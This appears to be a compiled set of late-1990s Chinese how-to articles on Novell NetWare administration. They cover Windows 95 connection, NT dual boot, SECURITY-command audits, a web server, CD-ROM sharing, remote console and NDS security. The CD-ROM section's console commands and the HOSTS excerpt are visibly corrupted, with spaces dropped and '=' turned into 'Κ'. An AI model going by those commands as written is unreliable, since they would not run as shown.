    Windows 95以其简单、易用、功能强大的独特风格成为单用户微机的标准操作平台。Netware则以其高性能、高可靠性的优势占领着约三分之一的局域网操作系统市场。如何才能把Windows 95工作站与Novell网相连呢?我通过实践掌握了操作方法，现把它介绍给大家。
    一、网络概况
    笔者所安装的网络配置如下：
    服务器：P166MMX，16M RAM，21G硬盘；使用Novell Netware 312网络操作系统（250个用户）。
    工作站为5台无盘工作站和1台有盘工作站；无盘站配置为：IBM PR200＋，8M RAM；有盘站配置为：P166MMX，32M RAM，21G硬盘，24×CD－ROM，已安装Windows 95操作系统。
    网络拓扑结构采用星型网，使用一台D－LINK DE－809TC 8口HUB进行网络连接，每台工作站上均有C－NET单口网卡（RJ45口），服务器上使用C－NET双口网卡。
    二、连接过程
    1在Windows 95工作站上安装网卡及网卡驱动程序。
    2用双绞线将Windows 95工作站与HUB相连。
    3启动Windows 95工作站至DOS状态，插入C－NET网卡驱动盘，执行驱动盘上的SETUP设置程序，先后执行菜单中的“Adapter Configuration”、“Change Configuration”，然后改变程序所列出的一系列参数配置，本例中的参数配置为：
IO ADDRESS:340
IRQ CHANNEL:IRQ 12
BOOT ROM:DISABLE
CHRDY CONTRAL:FROM IO
OPERATION MODE:JUMPERLESS
    按“ESC”键退出后，选择保存硬件配置。
    4重新启动计算机至Windows 95状态，依次点击“控制面板”、“网络”、“添加”、“适配器”、“添加”、“Novell/ANTHEM”、选择“NE2000 COMPATIBLE”，等待计算机安装完毕回到“网络”程序时，点击“NE2000 COMPATIBLE”、“属性”、“资源”、改变中断(IRQ)至“12”、I/O地址改至“340－35F”，最后点击“确定”退出“NE2000 COMPATIBLE属性配置”，将“基本网络登录方式”改为“Netware网络客户”，点击“确定”退出后，依照提示插入“Windows 95 CD－ROM”光盘，进行驱动程序的安装。
    5安装完毕后重新启动计算机至Windows 95状态，这时屏幕上应出现“输入口令”的对话框，输入正确的用户名和密码，即可登录到Novell网络服务器上，打开“网上邻居”时，可以完整地列出Novell服务器上的目录树，并可将其映射成某个驱动器盘符，以更加方便地使用服务器上的文件。
    三、注意事项
    1在C盘根目录上的CONFIGSYS配置文件中应定义适当的LASTDRIVE变量，否则将不能映射Novell服务器为某个驱动器。
    2如果不能正确上网，比如启动Windows 95时没有出现“输入口令”对话框，应仔细检查计算机的硬件配置。

返回


安装NT和Novell双操作系统的方法

《一键清理系统垃圾》

安装NT和Novell双操作系统的方法

    服务器配置为：P2－333 、64MB内存、昆腾6.4GB硬盘、32X光驱、Accton 1208T网卡。网络操作系统为：Novell 3.12和Windows NT 4.0。步骤如下：

    一、划分硬盘分区

    1.制作一张DOS 6.22启动软盘，上有Fdisk.exe和Format.com。
    2.以软盘启动计算机；用Fdisk分区，建立一2GB的FAT16分区C，硬盘剩余的4GB不再分区；激活分区C，格式化C，并安装DOS 6.22操作系统。
    3.以硬盘重新启动计算机，进入DOS 6.22，安装相应的DOS文件，驱动光驱。

    二、安装Novell 3.12网络操作系统

    1.重启计算机，进入DOS 6.22;采用光盘安装Novell 3.12，系统安装位置选择在未分区部分，也就是剩余的4GB部分。具体安装、设置方法和普通的Novell 3.12完全一样。
    2.服务器安装调试完毕后，修改自动批处理文件Autoexec.bat，确保不要在自动批处理中启动Novell服务器。

    三、安装Windows NT 4.0网络操作系统

    1.重启计算机，进入DOS 6.22;采用光盘安装Windows NT 4.0。
    2.NT系统安装位置选择在C盘。
    3.必须选择保持现有的文件系统(无变化)一项，以确保C盘为FAT文件系统。
    4.按正常的方法安装设置Windows NT。

    四、改NT启动选单并配置相关的启动文件

    1.重启计算机，进入DOS；修改Autoexec.bat文件，加入自动启动Novell 3.12服务器。这样，进入DOS也就是启动Novell 3.12服务器。
    2.进入NT系统，修改启动系统选择文件C:\Boot.ini(纯文本文件)；可设置计算机启动是进入NT服务器还是DOS(即Novell 3.12服务器)。
    通过以上几步，就可以在一台服务器上同时安装两套网络操作系统。这种安装服务器，也存在一定缺限：
    ①每次只能启动一套网络操作系统，两套系统不能同时应用。
    ②NT服务器使用硬盘空间小。由于FAT16文件分配表的限制，C分区最大只支持2GB，而且C盘上还要安装DOS 6.22、Novell 3.12和Windows NT 4.0的启动文件，因此，NT系统使用的硬盘空间只有1GB多。

返回


查Novell网络安全漏洞

《一键清理系统垃圾》

查Novell网络安全漏洞

    Novell网络中，如某一用户的权限过大或口令不安全都会对整个网络的安全构成威胁。所以定期对网络的安全情况进行检查是很有必要的。
    Novell Netware 3.12提供的SECURITY命令，就可以迅速得到网络配置的安全情况。首先，以管理员身份登录，在SYS：SYSTEM目录键入SECURITY ，系统会对整个网络进行安全检查，并将安全报告显示在屏幕上。也可以执行F：\SYSTEM\SECURITY>REPORT.TXT命令，利用DOS的重定向功能将安全报告存放在文本文件REPORT.TXT中。以便于用文字处理软件打开REPORT.TXT进行分析处理。

    以下所列是在报告中经常出现的网络安全弱点：

    (1)Objects with no password assigned(对象未分配口令)

    如果某一对象未分配口令，则任何用户都可以以其用户名登录上网，获取其个人的文件资料，并可以获得网络中的全部用户的清单。这是网络安全中的一个主要漏洞。

    (2)Objects with insecure password(对象口令不安全)

    Novell建议用户将几个不相关的单词以某种符号连接起来作为口令(如“WHO＊YOU－ARE”)，因为这种口令是不容易被猜测的。SECURITY还要求用户至少每60天改变一次口令。

    SECURITY可以查出口令相同或口令少于五个字符的用户，还可以查出用户口令是否过期，过期后还可以使用旧口令的次数等信息。这样管理员就可以根据这些提示对用户的口令加以修改。

    (3)Objects with security equivalence to supervisor(对象的安全性等效于管理员)

    当一用户的安全性等效于管理员时，他就拥有对文件服务器的全部访问权。为了方便对网络的管理，可以设定几个等效于管理员的用户。通过此命令，可以查出网络中的等效管理员是否合法，也可以查出管理员口令是否已泄漏。

    (4)Objects that have privileage in the root directory of a volume(对象在卷根目录中具有特权)

    授予用户在卷根目录层中的特权就等于授予用户在整个卷中的特权。在卷的根目录中授予“授权权”会使得用户在其所在卷的任何子目录中对所有的用户授予任何权限。

    (5)Objects that do not have a login script(对象无登录底稿)

    登录底稿保存在用户的邮箱中，为使每一用户都能发送邮件，所有用户对邮件目录都具有Create和Write权。这样入侵者就可以给没有登录底稿的用户编写一个底稿，这也是一个潜在的安全漏洞。

    (6)Objects with excessive rights in the standard directories(对象在标准目录中权限过大)

    每一用户在标准目录中都应具有以下权限：

    SYS：SYSTEM　［　］
    SYS：PUBLIC　［ROS］
    SYS：LOGIN　［ROS］
    SYS：MAIL　［WC］

    当用户在这些目录中的权限过大时，会对网络的安全运行构成极大的威胁。 　　使用SECURITY命令，可以迅速得到整个网络的安全报告，如发现安全漏洞，则必须进行及时的纠正。

返回


NOVELL局域网上WEB的建立

《一键清理系统垃圾》

NOVELL局域网上WEB的建立

在20世纪90年代中后期爆发了对INTERNET，特别是对访问WWW（WORLD WIDE WEB）的极大兴趣，许多网友都不再满足于从网上获取信息这种单向服务，他们制作了自己的主页，并把他上载到INTERNET，地球上任何一个地方的人都可以对他进行访问。作为一种训练或学习，何不在您的局域网上建一个站点，把自己在WEB上的“家”安在局域网上，这样既省钱又过瘾，您不想试试吗？

NOVELL的NETWARE网络操作系统在许多单位有着广泛的应用，现在你可以在你的NETWARE 4.X文件服务器上建立一个WORLD WIDE WEB服务器。所需要的软件就是NETWARE 4.X所带的一组可装载模块“WEB SERVER”NLM（NETWARE LOADABLE MODULE），他运行在NETWARE 4.X 文件服务器上，利用NETWARE的文件系统和安全性为NETWARE客户和非NETWARE客户提供WEB服务。

在安装WEB SERVER NLM之前，需要做一些预先的准备和配置，所有这些工作都是在文件服务器控制台（冒号提示符）下进行的。

一、安装和配置TCP/IP协议

    首先是安装和配置TCP/IP协议，这要求你有一个供你的服务器使用的IP地址，如果不需要和其他网络包括INTERNET相连的话，可任选一个IP地址和地址结构，例如156.111.123.1。具体步骤是：1、在你的服务器控制台上（：提示符）输入命令LOAD INETCFG 2、对于所出现的消息“TRANSFER LAN DRIVER，PROTOCOL AND ROMOTE ACCCES COMMAND？”回答YES 3、在出现的INTERNETWORKING CONFIGURATION窗口中，选择PROTOCOL选项，你会看到一个协议列表，突显TCP/IP，并按回车键。 4、在所弹出的TCP/IP PROTOCOL CONFIGURATION窗口中，设置TCP/IP STATUS的值为“ENABLE”即可 5、按ESC键从TCP/IP PROTOCOL CONFIGURATION屏幕中退出，并对提示信息“UPDATE TCP/IP CONFIGURATION？”回答YES 6、按ESC键退回到INTERNETWORKING CONFIGURATION菜单，并选择BINDINGS，按INSERT键，从配置协议列表中选择TCP/IP，再按INSERT键，选择你要绑定TCP/IP协议的LAN适配器，如：NE2000 网卡，这时把你选定的服务器IP地址（156.111.123.1）和子网掩码(255.255.0.0)分别填入LOCAL IP ADDRESS和SUBNETWORK MASK OF CONNECTED NETWORK处，凡是其他没有提到的设置，取默认值就行了。7、按ESC键退出，并对提示信息“UPDATE TCP/IP CONFIGURATION？”回答YES，以保存新的配置设置。这样TCP/IP的安装配置就完成了，看起来复杂，其实就是使TCP/IP协议生效（ENABLE）并填入将来这个WEB服务器的IP地址。在服务器控制台提示符下，把服务器“DOWN”下来，重新启动，所做设置就起作用了。

二、安装和配制置DNS

    安装和配置TCP/IP后，下项准备工作就是安装和配制置DNS服务器。这项工作不是必须的，但是如果你的WEB SERVER要连接到INTERNET或你组织中的INTRANET时需要使用DNS，或者说是为了使用和管理更方便，就需要在你的服务器上配置DNS，这样就可以按域名而不是按数字式的IP地址访问你的主页了。安装和配置的一般步骤如下：1、从文件服务器控制台上输入LOAD INSTALL 2、从INSTALL菜单上选择PRODUCT OPTION 3、在OTHER INSTALL ACTION菜单中选择INSTALL A PRODUCT NOT LIST 并按回车键 4、若要从一个作为NETWARE卷安装在服务器上的CD中安装，按F3键，然后输入路径为NWIP：NWIP/NWIP1，或直接输入包含NWIP1的子目录的路径（如：D：/PRODUCTS/NWIP/NWIP1） 5、当提示你退出安装过程的时候，按ESC键退出安装，下面就可以配置DNS了 6、在服务器控制台上输入LOAD UNICON，这时你必须以具有SUPERVISOR特权的用户注册到DNS，即要输入管理员（ADMIN）或其等效用户的名字及口令，才能进行配置，输入正确的名字及口令后，回车 7、从弹出窗口中选择MANAGER SERVICE，再选择DNS，然后再选择INITIALIZE DNS MASTER DATABASE 8、这时在提示窗口中输入你选择好的或为连接INTERNET而申请到的DNS域名，（如：JSJ.NET）输入后退出UNICON即可，其他没有提到的选项，取其默认值就行了。

三、修改缺省配置

   在安装NETWARE WEB SERVER NLM之前，还有两个特别值得注意的地方需要设置修改一下，这也是你的WEB SERVER安装成功与否的关键。一是NETWARE的最大包接收缓冲区数，把他的值由100增加到1000，可通过在控制台上输入命令来完成：SET MAXIMUM PACKET RECEIVE BUFFERS=1000，并要把这条添加到你的AUTOEXEC.NCF文件中去。二是如果你安装了DNS系统的话，请在一台工作站以管理员身份上网，把SYS:ETC\HOSTS文件（一个文本文件）中的以下内容删掉并存盘：

127.0.0.1 loopback lb localhost
127.0.0.2 # normal loopback address
130.57.4.2 ta tahiti ta.novell.com loghost
130.57.6.40 osd-frog frog
130.57.6.144 sj-in5
in5192.67.172.71 sj-in1
in1 192.67.67.20 sri-nic.arpa nic.ddn.mil nic 26.2.0.74 wsmr-simtel20.army.mil simtel20

你也可以在UNICON实用程序中把他删掉

四、安装WEB SERVER

    有了前面的准备工作，NETWARE WEB SERVER NLM的安装就简单了，象安装DNS域名系统一样，如果将“NETWARE WEB SERVER NLM ”CD作为一个NETWARE卷安装到服务器上（缺省卷名是SERVERNAME/WEB：），具体步骤如下：1、从文件服务器控制台上输入LOAD INSTALL 2、选择PRODUCT OPTION 3、选择INSTALL A PRODUCT NOT LIST 并按回车键 4、根据提示按F3键，输入NETWARE卷名和WEB SERVER NLM文件的路径WEB：WEB/DISK1，或直接输入包含WEB SERVER NLM文件的路径（如：D：/PRODUCTS/WEBSERV/DISK1）并回车 5、在拷贝完文件后，将提示你输入WEB SERVER ADMINISTRATOR口令，请输入一个与ADMIN类似的不同口令。6、当提示你已SUCCESSFLULLY INSTALL YOUR WEB SERVER时，DOWN下服务器，并从DOS提示符下重新引导服务器，到此为止WEB服务器已经安装完毕了。

五、工作站的配置

    现在，一个基本的WEB站点已建立起来了，你可以登录一台工作站，当然了，你也要对工作站WINDOWS 9X或NT添加TCP/IP配置，通过“控制面板”--->“网络” ?“添加” --->“协议”?“添加”，从弹出的“选择网络协议”框中选择MICROSOFT的TCP/IP协议，并把安装盘放入光驱，单击“确定”即可安装，安装完成后，在“配置”框可看到多了一个TCP/IP协议并双击它，在TCP/IP协议属性里对DNS标签和IP标签加以配置即可，在DNS标签中选择“启用DNS”并在“主机”和“域”中分别添入你的WEB主机名（如：NWSERVER）和域名（如：JSJ.NET）。在IP标签中选择“指定IP地址”并填入你的WEB主机IP地址（156.111.123.1）。重新启动后，在IE或NETSCAPE浏览器地址栏输入WEB服务器的IP地址（156.111.123.1）或域名(NWSERVER.JSJ.NET)，就可以看到一个缺省的名为INDEX.HTM的主页，它是在安装WEB的过程中创建的，如果你看到了那个缺省主页，证明你已成功的安装了WEB SERVER。

六、WEB服务器的管理和维护

    不过，正如你所见的，物理安装已经完成了，但工作还没完，你还要接着对WEB服务器进行维护和管理工作，这些工作都要通过NOVELL的WEB SERVER ADMINISTRATION实用程序WEBMGR.EXE来进行。这是一个WINDOWS程序，应在一个注册到网络的WINDOWS 9X工作站上运行，他被安装在SYS：PUBLIC目录下。运行这个程序，首先要在弹出窗口的FILE菜单下，选择SELECT SERVER，把SYS：WEB目录作为你的WEB服务器的根目录，因为所有的WEB支持和运行文件都在这个目录下，在所弹出的WEB SERVER配置对话框中，共有五个标签：SERVER，DIRECTORY，USER ACCESS，SYSTEM ACCESS和LOGS，你可以在SERVER标签里的FULL SERVER NAME处设置WEB SERVER的IP地址和在TCP PORT处设置TCP端口等，这几个标签的设置大多情况下，取其默认值就行了。不过你要特别注意USER ACCESS标签的设置，这是一个与WEB SERVER的安全性有关的配置，在DIRECTORY域中，你可选择任何在DIRECTORY标签下列出的目录供用户访问，若你要用户对某一目录的访问，可以向AUTHORIZED USER中添加用户，只有出现在这里的用户才能访问上面你所指定的目录。用户访问的缺省主页是放在SYS：/WEB/DOCS下的INDEX.HTM文件。

七、工作站IP地址的动态维护

     作为一个WEB MASTER，你的工作到此只是完成了服务器一端的设置安装工作，网络上其他众多工作站的IP地址和DNS域名需要你去管理和维护，而这又是一件非常麻烦的事：给每台机器分配IP地址，建立对照表等。不过，现在你可以借助于NOVELL的DHCP（动态主机配置协议）动态地分配IP地址，这样就轻松多了。DHCP也是一个NLM（可装载模块），它的安装与DNS的安装方法一样，DHCP文件存在于安装盘的NWIP目录下的DHCP目录中，按照前面的安装方法把它LOAD上即可，安装好后，利用命令LOAD DHCPSVR来加载DHCP服务程序，对DHCP服务程序的配置是通过DHCPCFG实用程序完成的（LOAD DHCPCFG命令），在DHCPCFG配置菜单中，SUBNET PROFILE选项中输入一段可用IP地址（输入其始和结束IP地址），在DHCP ADDRESS ASSIGNMENTS选项中，你可以给象文件服务器、WEB服务器这样的结点分配永久的地址，在DEFINE EXCLUDED NODE选项中排除某些站点地址，以禁用这些IP地址。在服务器端配置完后，只要在客户端的WINDOWS NT，WINDOWS 9X的TCP/IP属性里设置成“自动获取IP地址”就行了。

返回


实现NetWare网CD-ROM共享

《一键清理系统垃圾》

实现NetWare网CD-ROM共享

一、问题的提出
    CD－ROM以其容量大、速度快、携带方便而普遍为当今微机所使用。但由于必须有相应的光驱驱动，因而需花费一定费用。对网络来说，每台工作站配置一台光驱无疑是一种浪费，实现CD－ROM共享是最理想的办法。对Novell NETWARE网来说，网络设计者已提供了共享服务器CD－ROM的方法。但其必须有一些前提条件，比如服务器光驱必须连接SCSI磁盘控制器，甚至必须是美国Adaptec公司的产品，而使用同样普遍的IDE磁盘控制器，则不能实现CD－ROM共享。

    二、实现方法
    为解决CD－ROM共享存在的一些问题，Novell公司陆续开发了一些程序，支持NETWARE3．12～NETWARE4．10的CD－ROM共享问题，其中主要包括连接IDE磁盘控制器的CD－ROM共享问题。下面以一台使用连接IDE硬盘控制器光驱的兼容PC机作为NETWARE4．1服务器为例介绍如何实现CD－ROM的共享。
    1．首先在服务器C盘根目录下config．sys和autoexec．bat中加入相应的光驱驱动程序，使DOS启动后能正常使用光驱。
    2．将以上文件拷贝至服务器与SERVER．EXE同一目录中（覆盖同名文件）。
    3．将以上文件拷贝至服务器NETWARE分区SYS卷的SYSTEM目录中（覆盖同名文件）。
    （对NETWARE3．12来说还需拷贝NETWARE．312子目录中的两个文件，并将SYS卷上的CDROM．MSG全部删去。）
    4．重新配置STARTUP．NCF和AUTOEXEC．NCF文件。
    NETWARE4．10STARTUP．NCF：
    LOADIDEATAPORTΚ1FOINTΚE
    NETWARE4．10AUTOEXEC．NCF：
    LOADCDROM
    （若为NETWARE3．12，则
    NETWARE3．12STARTUP．NCF：
    LOADNPAPATCHINTΚ14
    LOADIDEATAPORTΚ1FOINTΚ14
    NETWARE3．12AUTOEXEC．NCF：
    LOADAFTER311
    LOADCDROM）
    5．重新启动服务器。
    6．CDGROUPCDGROUP2
    屏幕显示：
     CDROMACCESSGROUPLIST
     GROUP：0ΛEVERYONE
    GROUP：2ΛCDGROUP
    该命令为建立CD－ROM访问组，其中0号访问组为系统自动生成。
    7．CDDEVICELIST
    屏幕显示：
     CDROMDEVICELIST
    NO．ACT．DEVICENAMEVOLUMENAMEMOUNTED
    1Y［V025－A0－D1：1］SONYCD－ROMCDU111FW：1．1iWIN95BN
    其中NO．Κ1为CD－ROM设备号。
    8．CDRENAME／DΚ1CD41
    屏幕显示：
     CDROMVOLUMENAMELIST
    NO．MOUNTNAMECREATEDMEDIAVOLUMEIDMEDIASTATUS
    1CD41WINDOWS95BONLINE
    该命令的作用是将CD－ROM的卷标从WINDOWS95B改为CD41，以方便用户使用。
    9．CDMOUNT1（或CD41）／GΚ2
    以卷标CD41在网络上安装CD－ROM卷。其中参数GΚ2为共享该卷的用户组，若不带该参数则为EVERYONE用户组所共享。键入以上命令后，则开始建立CDROM索引，屏幕显示：
    GroupAccessRights：CDGROUP
    CreatCDROMIndex［］1－100％
    当索引100％建好后，则CD－ROM卷安装完成，此时该卷为超级用户和CDGROUP组用户所共享。
    10．以超级用户或CDGROUP组用户登录上网，建立映像，如MAPK：ΚFS1：
    则K盘即为CD－ROM映像。其中FS1为服务器名。
    11．若要更换CD－ROM则键入命令
    CDCHANGE1／GΚ2／R
    其中，参数1为CD－ROM设备号，GΚ2为2号组用户共享，R指服务器CD－ROM更换后，需重新建立索引文件，但其网络卷名仍为CD41，用户无需改变CD－ROM映像。

    三、几点说明
    1．从以上安装过程来说，并不是每一步都必须的，如第6、7步，第6步主要获取CD－ROM设备号，为第7步做准备。而第7步的目的主要是使用户使用固定卷标。但这种做法也有缺点，就是当要经常使用多个CD－ROM时，由于每次都要重新建立索引则反而不便。此时可不使用第7步，直接使用CDMOUNT1［或CD－ROM盘卷标］进行安装，当更换其它CD－ROM时，则先使用CDDISMOUNT1卸下该卷，再使用CDCHANGE1，然后使用CDMOUNT1／GΚ2进行新卷的安装，若原已建立过索引，则安装过程很简单。若要经常使用多个CD－ROM，则对每个CD－ROM只要建立一次索引，此后可使用以上三个命令直接安装使用。
    2．有关CD－ROM命令的使用可借助命令CDHELP获得。
    3．在建立组用户时，尽量不使用与CD－ROM设备号相同的组号。如本人使用CDGROUPCDGROUP1建立用户组，则CD－ROM不能为该组用户所共享，而只能为超级用户享用。

返回


谈Netware的远程控制台

《一键清理系统垃圾》

谈Netware的远程控制台

无论是Netware 3.12,还是Netware 4.X及5.X,Novell都为该系列产品提供了远程控制服务功能。远程控制台服务功能能够在远程工作站上,实现本地服务器控制台上的全部功能,包括装/卸载Netware卷、升级Netware文件甚至重启服务器等。这使得系统管理员可以坐在家中(甚至任何地方)管理放在公司里的服务器,只要他有一台电脑、一个Modem和一个可用的电话线路。

远程控制台的实现可以通过两种连接方式来实现:一种是局域网或广域网连接,一种是Modem连接。由于局域网或广域网连接方式在许多资料中已介绍得比较详细,本文不再重复,而将重点介绍Modem连接方式（本文介绍的方法在Netware 4.11上实验通过）。

Modem连接方式又可分两种:一种是Modem方式,即远程工作站—Modem—电话线—电话局—电话线—Modem—服务器的连接方式;另一种是空Modem方式,即工作站与服务器之间的串口直接连接方式(Netware未提供打印口直接连接方式)。两种连接方式的实现过程基本一致。

1. 在服务器上,首先要完成以下步骤:

1)装入Remote模块:Load Remote.NLM。

2)输入密码,这个密码在远程工作站登录服务器时要用到。

3)装入通讯端口驱动程序,并回送有关参数:Load Aiocomx或Load Aiocom Force。

4)装入Modem通讯模块:Load RS232 [端口号] [Modem 速率] [N] [C]。其中端口号为串口编号,1或2;Modem速率就不用说了;当用空Modem时需带参数N;而带C则表示使用回叫功能。当使用回叫功能时,你必须在Sys:System目录下建立一个名为Callback.Lst的文本文件,例如你可以这样来写:

0731

4211346

其中第一行为电话长途区号,第二行为本地电话号码。这样当远程工作站通过电话线路拨入服务器后,服务器会反过来通过Modem拨叫07314211346这个号码来重新建立与远程工作站的连接。这就是“回叫”功能。

2. 在远程工作站上,必须完成以下步骤:

1)准备好一台远程工作站。需要指出的是,这里所说的远程工作站,完全可以是任何一台普通的可用PC(非空Modem方式下,Modem和可用的电话线不可少),有DOS 3.3以上的操作系统和300KB以上的可用内存。

2)在远程工作站上,建立一个专用目录,目录名任取。从Netware的Sys卷上,找到下列文件并拷贝到专用目录下:

Rconsole.Exe

Rconsole.Hlp

Rconsole.Msg

Ibm_Run.Ovl

Run.Ovl

Ibmaio.Ovl

_Aio.Ovl(特别提示:通常你找不到该文件,但你会找到Ibm_Aio.Ovl文件,请拷贝出来并改名为_Aio.Ovl)

Textutil.Hep

Textutil.Idx

Textutil.Msg

3)现在你可以转到专用目录下,输入Rconsole并回车。

4)从通讯方式选单下选:Asynchronous。

5)然后进入“Configuration”配置你的Modem:

A.使用箭头键加亮你要改写的字段,并按回车键。

B.有关Modem的参数请查阅贺氏Modemo命令手册。如果你通过Modem方式呼叫服务器,你应知道服务器接入电话网的号码,然后在Atdt命令后包含它,如:

Atdt07318765432。

C.Userid字段随你填,它将显示在服务器上。

D.Callback字段应填写你在Callback.Lst文件中所写的数字,如：07314211346。

E.按Esc键退出窗口,并保存设置。

6)选择“Connect To Remote Location”,得到可访问的服务器列表。

7)选择一个服务器,稍后会提示你输入口令,当服务器控制台的屏幕显示在你的远程工作站上时,你就可以开始管理你的服务器了。如果你使用了回叫功能,服务器将终止连接并与Callback.Lst文件核对远程工作站送来的回叫数字,如果存在,服务器再通过该数字回叫远程工作站,最终激活远程工作站。

注意:Rconsole不能保证所有的数据包都能按时收发,在使用中如果你发给服务器的请求没有应答,通常应该再试一次。

8)按 〈Alt〉+〈F2〉键可退出Rconsole。

返回


谈Novell网和NT网混建

《一键清理系统垃圾》

谈Novell网和NT网混建

    随着我国高等院校计算机基础教育改革的快速推进，国内各高校计算机基础教育的教学内容和课程设置发生了很大的变革，除部分基于DOS环境的应用软件和工具软件外，Win 9X操作系统及其平台上的应用软件逐渐成为计算机教学的重点。但是由于学生误操作或蓄意删除硬盘上的系统文件，经常导致系统瘫痪；重新安装系统和应用软件需要大量时间。有些机房安装了硬盘保护卡，但保护卡不是占据硬盘空间就是价格昂贵，且易产生一些硬件或软件冲突，从灵活性、系统完整性和投资的角度来说，“软”保护更为可取。笔者在机房采用Novell网和NT网混建，并利用一些工具软件（超级保镖2000和Ghost）进行系统维护，取得了很好的效果。

    Novell网和Win NT网混建

    1、混合网的硬件连接(如图1)

    图1 计算机设备的连接拓扑结构
    2、安装NetWare服务器和NT服务器
    NetWare 服务器操作系统采用Netware3.x 或Netware4.x 均可，并安装一些基于DOS环境的应用软件(UCDOS、FoxBASE＋、C、Pascal、Fortran等)，以满足开设For DOS类课程的教学需求。若需要使用Win 3.x系统，也安装到NetWare服务器上。
    Win NT 服务器操作系统采用Win NT 4.0，并安装一些各专业教师制作的CAI课件和常用Windows系列应用软件的备份。
    3、安装NetWare无盘工作站
    在工作站的网卡上安装一片Boot ROM 芯片，利用网卡的Setup程序设置Boot ROM为Enable, 若是PnP网卡将其设为Jumpless模式，并指定网卡IRQ中断和I/O地址，然后制作启动映像文件NET＄DOS.SYS，要保证所有工作站能无盘登录NetWare服务器。
    4、安装Windows工作站
    首先用FDISK将硬盘分为C盘和D盘两个分区，C盘安装操作系统和应用软件，D盘给学生存放自己的文件（最好将硬盘格式化为FAT32格式）；接着安装Windows 95/98和一些常用Windows系列应用软件，如Office 97、Visual FoxPro、Visual Basic等；然后进行网络配置，指定网卡IRQ中断和I/O地址（要和无盘工作站的设置保持一致），注意避免IRQ、I/O地址冲突，保证工作站能登录NT服务器；最后安装超级保镖2000，并选择对C盘实施保护。
    5、登录方法
    重新启动机器后，系统提示选择是否从本地硬盘启动，即可分别采用无盘登录NetWare 服务器或从本地硬盘登录NT服务器。如果要让Windows工作站同时登录NT服务器和NetWare 服务器，在工作站上还需要添加配置“NetWare网络客户”。

    系统维护

    1、基于DOS环境的应用软件
    由于这部分软件安装在NetWare 服务器上，只要权限设置正确，一般不会遭到破坏。
    2、Windows系列应用软件
    如果软件被学生卸载或删除，从Windows NT 服务器的“网上邻居”使用服务器中备份的应用软件直接安装即可。同时这也给学生自己动手学习安装应用软件提供了一个难得的机会和环境。
    3、Win 9X操作系统
    如果学生更改了系统配置或删除了系统文件，造成计算机系统瘫痪，可采用超级保镖2000对C盘的软件系统进行恢复。只需在计算机自检时按下F10键，选择“全部放弃”选项，输入管理员口令后即可将C盘的系统还原，与安装工作站时采取保护措施前一模一样。如果C盘上有学生的重要文件需保留，可选择“放弃保护且保存到新目录”选项，在恢复C盘原有系统后，将所有在保护模式下修改及新建的文件保存到特定的文件夹中。注意在恢复系统后，就退出了保护状态，需要重新设置保护。

    补充说明

    1、工作站双启动的网卡设置很关键，PnP网卡需将其设为Jumpless模式，因为无盘登录NetWare服务器时使用的NET＄DOS.SYS文件中IRQ中断和I/O地址是固定的，而即插即用功能会导致网卡在Windows系统中发生IRQ、I/O地址冲突。若设置IRQ=3、I/O=300H，要避免和COM2发生冲突，必要时在CMOS中将COM2屏蔽。
    2、因为使用DOS操作系统，硬盘的文件系统没有任何安全保障，一个命令就会破坏整个硬盘文件系统。建议硬盘采用FAT32格式，这样从工作站无盘登录NetWare 服务器后，由于DOS不识别FAT32格式，不能操作硬盘文件。但Fdisk命令仍会导致系统瘫痪，只有使用Ghost恢复系统。
    3、Ghost软件支持“一对多”安装拷贝，若有多台工作站瘫痪，可从每台工作站以超级用户身份无盘登录NetWare 服务器，运行Ghost程序同时对多台工作站进行系统恢复。笔者在安装第一台Windows工作站后，就使用Ghost 的“Local→Disk→To Image”方式制作了整个硬盘的映像文件保存到NetWare 服务器中，其他60多台工作站的安装采用“Local→Disk→From Image”方式进行“一对多”安装拷贝，仅用一天时间就完成了全部有盘工作站的安装。

返回


透视Novell的NDS(安全篇)

《一键清理系统垃圾》

透视Novell的NDS(安全篇)

    网络应采取何种控制技术保证安全访问而绝对禁止非法者进入，已经成为网络建设的重大对策问题。通过安全地控制网络资源和用户账号以及对NDS数据库中对象属性的访问，使网络管理员可以从一个集中点实现对整个网络的访问和安全控制，NDS能够提供切实有效的网络安全的全面解决方案。
    无论是企业内部网络还是与Internet相连，都必须解决一个关键问题，即网络的安全性问题。
    首先，我们先来看看什么是网络安全，或者说什么样的网络才可以称得上是安全的网络。目前Internet及企业内部网络上大量的非法入侵使我们认为，一个安全的网络系统应该是将各种类型的非法事件都挡在网络之外，网络能够持续稳定地运行。其实，这种说法并不全面。一个安全的网络应该知道在何时何处哪个用户在网络上做了什么事（When、Where、Who、What），即网络能够跟踪记录下网络上的事件和出现的变化，网络管理员可以根据详细的日志报告采取相应的防范措施。由于有了对网络运行的记录，对网络的分析也是主动的，从而排除一些安全隐患。网络安全措施可以分为两种：一种是直接防范或称为访问控制。这种方法往往针对已知的可能的入侵手段和方式。另一种是间接防范措施或称为审计（Auditing），它将网络中的各种事件记录到一个数据库中为评价网络安全提供材料。这两种方式相辅相成。通过审计可以发现网络中存在的问题和安全漏洞，然后通过直接措施加以弥补和改善，解决之后又可以通过审计检查结果。还有一些措施如模拟攻击，也可以通过日志来发现问题。
    构建网络安全体系的重要因素主要有：明确网络资源、确定网络访问点、限定访问权限、确认安全隐患、内部的安全问题。而Novell的NDS可以从以上各个方面提供解决措施。
    明确网络资源 在网络安全方面，常见的一个问题就是网络管理员不能得到一个关于网络的全面拓扑图，特别是随着网络的不断增长和变化，掌握网络的全面情况就更加困难，因而给网络管理员提供一个清晰的网络视图十分重要。NDS将网络中所有资源以对象的方式保存在严格的树形结构数据库中，这些对象包括：网络用户、服务器、交换机、应用程序等。它能为网络管理员提供一个清晰集成的网络结构的视图。通过这个网络结构图，可以清楚地辨识每个使用者在网络上的身份、地位、权限、位置和所处的部门，并且可以清楚地看出他与整个网络的对应关系。另外，这个结构图是非常具有弹性的。它可以根据实际网络发生的变化和增长而随时调整，因而可以保证与实际运行的网络是高度一致的。这种集中的统一管理方式大大减轻了网络管理人员出错的可能。
    确定网络访问点 网络管理员应当了解潜在的非法入侵者会何时何地进入系统。对网络的非法入侵有内部和外部两个方面。企业与Internet相连不可能完全杜绝从外部访问公司的内部数据。基于NDS的安全解决方案使用户无论在网络的哪个地方都可识别他的身份。NDS是一个优秀的网络安全平台，建立在Novell目录服务之上的应用可以灵活地控制网络边界、严把网络安全关口。BorderManager是利用NDS架构网络安全信息结构的出色代表，除了提供防火墙、认证等服务之外，还能提供虚拟专网和代理缓存等多项增值服务，它使用户在不牺牲网络速度的条件下确保网络的安全运行。
